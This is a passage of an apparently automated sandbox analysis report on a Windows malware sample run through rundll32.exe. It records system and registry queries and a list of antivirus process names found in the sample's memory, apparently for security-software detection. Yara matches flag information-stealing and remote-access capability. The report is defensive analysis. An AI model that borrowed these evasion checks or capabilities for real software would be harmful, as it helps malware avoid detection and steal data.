Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100060D0 lgetVersion@Engine@ScScript@@SAHXZ,lgetStackTrace@DebugAPI@ScScript@@QBE?AVString@ScCore@@HH@Z,lgetName@Engine@ScScript@@QBEABVString@ScCore@@XZ, 4_2_100060D0
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.400127832.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.400000830.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.400127832.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.400000830.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY